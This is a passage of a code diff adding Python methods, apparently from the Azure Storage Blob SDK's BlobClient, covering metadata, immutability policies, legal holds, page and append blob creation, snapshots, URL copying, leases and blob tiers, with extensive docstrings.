:keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + """ + options = self._set_blob_metadata_options(metadata=metadata, **kwargs) + try: + return self._client.blob.set_metadata(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def set_immutability_policy(self, immutability_policy, **kwargs): + # type: (ImmutabilityPolicy, **Any) -> Dict[str, str] + """The Set Immutability Policy operation sets the immutability policy on the blob. + + .. versionadded:: 12.10.0 + This operation was introduced in API version '2020-10-02'. + + :param ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Key value pairs of blob tags. + :rtype: Dict[str, str] + """ + + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + return self._client.blob.set_immutability_policy(cls=return_response_headers, **kwargs) + + @distributed_trace + def delete_immutability_policy(self, **kwargs): + # type: (**Any) -> None + """The Delete Immutability Policy operation deletes the immutability policy on the blob. + + .. versionadded:: 12.10.0 + This operation was introduced in API version '2020-10-02'. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Key value pairs of blob tags. + :rtype: Dict[str, str] + """ + + self._client.blob.delete_immutability_policy(**kwargs) + + @distributed_trace + def set_legal_hold(self, legal_hold, **kwargs): + # type: (bool, **Any) -> Dict[str, Union[str, datetime, bool]] + """The Set Legal Hold operation sets a legal hold on the blob. + + .. versionadded:: 12.10.0 + This operation was introduced in API version '2020-10-02'. + + :param bool legal_hold: + Specified if a legal hold should be set on the blob. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Key value pairs of blob tags. + :rtype: Dict[str, Union[str, datetime, bool]] + """ + + return self._client.blob.set_legal_hold(legal_hold, cls=return_response_headers, **kwargs) + + def _create_page_blob_options( # type: ignore + self, size, # type: int + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + premium_page_blob_tier=None, # type: Optional[Union[str, PremiumPageBlobTier]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + blob_headers = None + if content_settings: + blob_headers = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + + sequence_number = kwargs.pop('sequence_number', None) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + immutability_policy = kwargs.pop('immutability_policy', None) + if immutability_policy: + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + + if premium_page_blob_tier: + try: + headers['x-ms-access-tier'] = premium_page_blob_tier.value # type: ignore + except AttributeError: + headers['x-ms-access-tier'] = premium_page_blob_tier # type: ignore + + blob_tags_string = serialize_blob_tags_header(kwargs.pop('tags', None)) + + options = { + 'content_length': 0, + 'blob_content_length': size, + 'blob_sequence_number': sequence_number, + 'blob_http_headers': blob_headers, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'blob_tags_string': blob_tags_string, + 'cls': return_response_headers, + 'headers': headers} + options.update(kwargs) + return options + + @distributed_trace + def create_page_blob( # type: ignore + self, size, # type: int + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + premium_page_blob_tier=None, # type: Optional[Union[str, PremiumPageBlobTier]] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """Creates a new Page Blob of the specified size. + + :param int size: + This specifies the maximum size for the page blob, up to 1 TB. + The page blob size must be aligned to a 512-byte boundary. + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :param ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword int sequence_number: + Only for Page blobs. The sequence number is a user-controlled value that you can use to + track requests. The value of the sequence number must be between 0 + and 2^63 - 1.The default value is 0. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict[str, Any] + """ + options = self._create_page_blob_options( + size, + content_settings=content_settings, + metadata=metadata, + premium_page_blob_tier=premium_page_blob_tier, + **kwargs) + try: + return self._client.page_blob.create(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _create_append_blob_options(self, content_settings=None, metadata=None, **kwargs): + # type: (Optional[ContentSettings], Optional[Dict[str, str]], **Any) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + blob_headers = None + if content_settings: + blob_headers = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + immutability_policy = kwargs.pop('immutability_policy', None) + if immutability_policy: + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + + blob_tags_string = serialize_blob_tags_header(kwargs.pop('tags', None)) + + options = { + 'content_length': 0, + 'blob_http_headers': blob_headers, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'blob_tags_string': blob_tags_string, + 'cls': return_response_headers, + 'headers': headers} + options.update(kwargs) + return options + + @distributed_trace + def create_append_blob(self, content_settings=None, metadata=None, **kwargs): + # type: (Optional[ContentSettings], Optional[Dict[str, str]], **Any) -> Dict[str, Union[str, datetime]] + """Creates a new Append Blob. + + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict[str, Any] + """ + options = self._create_append_blob_options( + content_settings=content_settings, + metadata=metadata, + **kwargs) + try: + return self._client.append_blob.create(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _create_snapshot_options(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers, + 'headers': headers} + options.update(kwargs) + return options + + @distributed_trace + def create_snapshot(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Union[str, datetime]] + """Creates a snapshot of the blob. + + A snapshot is a read-only version of a blob that's taken at a point in time. + It can be read, copied, or deleted, but not modified. Snapshots provide a way + to back up a blob as it appears at a moment in time. + + A snapshot of a blob has the same name as the base blob from which the snapshot + is taken, with a DateTime value appended to indicate the time at which the + snapshot was taken. + + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on destination blob with a matching value. + + .. versionadded:: 12.4.0 + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Snapshot ID, Etag, and last modified). + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START create_blob_snapshot] + :end-before: [END create_blob_snapshot] + :language: python + :dedent: 8 + :caption: Create a snapshot of the blob. + """ + options = self._create_snapshot_options(metadata=metadata, **kwargs) + try: + return self._client.blob.create_snapshot(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _start_copy_from_url_options(self, source_url, metadata=None, incremental_copy=False, **kwargs): + # type: (str, Optional[Dict[str, str]], bool, **Any) -> Dict[str, Any] + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + if 'source_lease' in kwargs: + source_lease = kwargs.pop('source_lease') + try: + headers['x-ms-source-lease-id'] = source_lease.id + except AttributeError: + headers['x-ms-source-lease-id'] = source_lease + + tier = kwargs.pop('premium_page_blob_tier', None) or kwargs.pop('standard_blob_tier', None) + tags = kwargs.pop('tags', None) + + # Options only available for sync copy + requires_sync = kwargs.pop('requires_sync', None) + encryption_scope_str = kwargs.pop('encryption_scope', None) + source_authorization = kwargs.pop('source_authorization', None) + # If tags is a str, interpret that as copy_source_tags + copy_source_tags = isinstance(tags, str) + + if incremental_copy: + if source_authorization: + raise ValueError("Source authorization tokens are not applicable for incremental copying.") + if copy_source_tags: + raise ValueError("Copying source tags is not applicable for incremental copying.") + + # TODO: refactor start_copy_from_url api in _blob_client.py. Call _generated/_blob_operations.py copy_from_url + # when requires_sync=True is set. + # Currently both sync copy and async copy are calling _generated/_blob_operations.py start_copy_from_url. + # As sync copy diverges more from async copy, more problem will surface. + if requires_sync is True: + headers['x-ms-requires-sync'] = str(requires_sync) + if encryption_scope_str: + headers['x-ms-encryption-scope'] = encryption_scope_str + if source_authorization: + headers['x-ms-copy-source-authorization'] = source_authorization + if copy_source_tags: + headers['x-ms-copy-source-tag-option'] = tags + else: + if encryption_scope_str: + raise ValueError( + "Encryption_scope is only supported for sync copy, please specify requires_sync=True") + if source_authorization: + raise ValueError( + "Source authorization tokens are only supported for sync copy, please specify requires_sync=True") + if copy_source_tags: + raise ValueError( + "Copying source tags is only supported for sync copy, please specify requires_sync=True") + + timeout = kwargs.pop('timeout', None) + dest_mod_conditions = get_modify_conditions(kwargs) + blob_tags_string = serialize_blob_tags_header(tags) if not copy_source_tags else None + + immutability_policy = kwargs.pop('immutability_policy', None) + if immutability_policy: + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + + options = { + 'copy_source': source_url, + 'seal_blob': kwargs.pop('seal_destination_blob', None), + 'timeout': timeout, + 'modified_access_conditions': dest_mod_conditions, + 'blob_tags_string': blob_tags_string, + 'headers': headers, + 'cls': return_response_headers, + } + if not incremental_copy: + source_mod_conditions = get_source_conditions(kwargs) + dest_access_conditions = get_access_conditions(kwargs.pop('destination_lease', None)) + options['source_modified_access_conditions'] = source_mod_conditions + options['lease_access_conditions'] = dest_access_conditions + options['tier'] = tier.value if tier else None + options.update(kwargs) + return options + + @distributed_trace + def start_copy_from_url(self, source_url, metadata=None, incremental_copy=False, **kwargs): + # type: (str, Optional[Dict[str, str]], bool, **Any) -> Dict[str, Union[str, datetime]] + """Copies a blob from the given URL. + + This operation returns a dictionary containing `copy_status` and `copy_id`, + which can be used to check the status of or abort the copy operation. + `copy_status` will be 'success' if the copy completed synchronously or + 'pending' if the copy has been started asynchronously. For asynchronous copies, + the status can be checked by polling the :func:`get_blob_properties` method and + checking the copy status. Set `requires_sync` to True to force the copy to be synchronous. + The Blob service copies blobs on a best-effort basis. + + The source blob for a copy operation may be a block blob, an append blob, + or a page blob. If the destination blob already exists, it must be of the + same blob type as the source blob. Any existing destination blob will be + overwritten. The destination blob cannot be modified while a copy operation + is in progress. + + When copying from a page blob, the Blob service creates a destination page + blob of the source blob's length, initially containing all zeroes. Then + the source page ranges are enumerated, and non-empty ranges are copied. + + For a block blob or an append blob, the Blob service creates a committed + blob of zero length before returning from this operation. When copying + from a block blob, all committed blocks and their block IDs are copied. + Uncommitted blocks are not copied. At the end of the copy operation, the + destination blob will have the same committed block count as the source. + + When copying from an append blob, all committed blocks are copied. At the + end of the copy operation, the destination blob will have the same committed + block count as the source. + + :param str source_url: + A URL of up to 2 KB in length that specifies a file or blob. + The value should be URL-encoded as it would appear in a request URI. + If the source is in another account, the source must either be public + or must be authenticated via a shared access signature. If the source + is public, no authentication is required. + Examples: + https://myaccount.blob.core.windows.net/mycontainer/myblob + + https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot= + + https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken + :param metadata: + Name-value pairs associated with the blob as metadata. If no name-value + pairs are specified, the operation will copy the metadata from the + source blob or file to the destination blob. If one or more name-value + pairs are specified, the destination blob is created with the specified + metadata, and metadata is not copied from the source blob or file. + :type metadata: dict(str, str) + :param bool incremental_copy: + Copies the snapshot of the source page blob to a destination page blob. + The snapshot is copied such that only the differential changes between + the previously copied snapshot are transferred to the destination. + The copied snapshots are complete copies of the original snapshot and + can be read or copied from as usual. Defaults to False. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_). + + The (case-sensitive) literal "COPY" can instead be passed to copy tags from the source blob. + This option is only available when `incremental_copy=False` and `requires_sync=True`. + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) or Literal["COPY"] + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only if the source + blob has been modified since the specified date/time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only if the source blob + has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only + if the destination blob has been modified since the specified date/time. + If the destination blob has not been modified, the Blob service returns + status code 412 (Precondition Failed). + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only + if the destination blob has not been modified since the specified + date/time. If the destination blob has been modified, the Blob service + returns status code 412 (Precondition Failed). + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword destination_lease: + The lease ID specified for this header must match the lease ID of the + destination blob. If the request does not include the lease ID or it is not + valid, the operation fails with status code 412 (Precondition Failed). + :paramtype destination_lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword source_lease: + Specify this to perform the Copy Blob operation only if + the lease ID given matches the active lease ID of the source blob. + :paramtype source_lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :keyword bool seal_destination_blob: + Seal the destination append blob. This operation is only for append blob. + + .. versionadded:: 12.4.0 + + :keyword bool requires_sync: + Enforces that the service will not return a response until the copy is complete. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. This option is only available when `incremental_copy` is + set to False and `requires_sync` is set to True. + + .. versionadded:: 12.9.0 + + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the sync copied blob. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.10.0 + + :returns: A dictionary of copy properties (etag, last_modified, copy_id, copy_status). + :rtype: dict[str, Union[str, ~datetime.datetime]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START copy_blob_from_url] + :end-before: [END copy_blob_from_url] + :language: python + :dedent: 12 + :caption: Copy a blob from a URL. + """ + options = self._start_copy_from_url_options( + source_url=self._encode_source_url(source_url), + metadata=metadata, + incremental_copy=incremental_copy, + **kwargs) + try: + if incremental_copy: + return self._client.page_blob.copy_incremental(**options) + return self._client.blob.start_copy_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + def _abort_copy_options(self, copy_id, **kwargs): + # type: (Union[str, Dict[str, Any], BlobProperties], **Any) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + try: + copy_id = copy_id.copy.id + except AttributeError: + try: + copy_id = copy_id['copy_id'] + except TypeError: + pass + options = { + 'copy_id': copy_id, + 'lease_access_conditions': access_conditions, + 'timeout': kwargs.pop('timeout', None)} + options.update(kwargs) + return options + + @distributed_trace + def abort_copy(self, copy_id, **kwargs): + # type: (Union[str, Dict[str, Any], BlobProperties], **Any) -> None + """Abort an ongoing copy operation. + + This will leave a destination blob with zero length and full metadata. + This will raise an error if the copy operation has already ended. + + :param copy_id: + The copy operation to abort. This can be either an ID string, or an + instance of BlobProperties. + :type copy_id: str or ~azure.storage.blob.BlobProperties + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START abort_copy_blob_from_url] + :end-before: [END abort_copy_blob_from_url] + :language: python + :dedent: 12 + :caption: Abort copying a blob from URL. + """ + options = self._abort_copy_options(copy_id, **kwargs) + try: + self._client.blob.abort_copy_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def acquire_lease(self, lease_duration=-1, lease_id=None, **kwargs): + # type: (int, Optional[str], **Any) -> BlobLeaseClient + """Requests a new lease. + + If the blob does not have an active lease, the Blob + Service creates a lease on the blob and returns a new lease. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :param str lease_id: + Proposed lease ID, in a GUID string format. The Blob Service + returns 400 (Invalid request) if the proposed lease ID is not + in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A BlobLeaseClient object. + :rtype: ~azure.storage.blob.BlobLeaseClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START acquire_lease_on_blob] + :end-before: [END acquire_lease_on_blob] + :language: python + :dedent: 8 + :caption: Acquiring a lease on a blob. + """ + lease = BlobLeaseClient(self, lease_id=lease_id) # type: ignore + lease.acquire(lease_duration=lease_duration, **kwargs) + return lease + + @distributed_trace + def set_standard_blob_tier(self, standard_blob_tier, **kwargs): + # type: (Union[str, StandardBlobTier], Any) -> None + """This operation sets the tier on a block blob. + + A block blob's tier determines Hot/Cool/Archive storage type. + This operation does not update the blob's ETag. + + :param standard_blob_tier: + Indicates the tier to be set on the blob. Options include 'Hot', 'Cool', + 'Archive'. The hot tier is optimized for storing data that is accessed + frequently. The cool storage tier is optimized for storing data that + is infrequently accessed and stored for at least a month. The archive + tier is optimized for storing data that is rarely accessed and stored + for at least six months with flexible latency requirements. + :type standard_blob_tier: str or ~azure.storage.blob.StandardBlobTier + :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to download. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient 